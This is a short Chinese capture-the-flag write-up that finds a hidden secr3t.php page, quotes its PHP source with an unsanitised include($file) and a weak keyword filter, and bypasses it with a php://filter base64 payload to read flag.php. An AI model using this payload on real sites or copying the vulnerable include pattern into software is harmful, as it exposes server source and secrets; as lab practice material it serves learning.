查看页面源代码,有提示
点进去访问看看
又出现一个跳转界面
再点进去一看,已经查阅结束了
应该是错过了一些东西的,我们抓个包看看有没有遗漏信息
发现 secr3t.php ,访问看看
发现源代码
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
发现文件包含,给了提示,flag放在了flag.php里
尝试读取flag.php
但是看不见
看了一下源代码并没有过滤filter函数,尝试使用php://filter伪协议 文件包含读取flag.php
?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码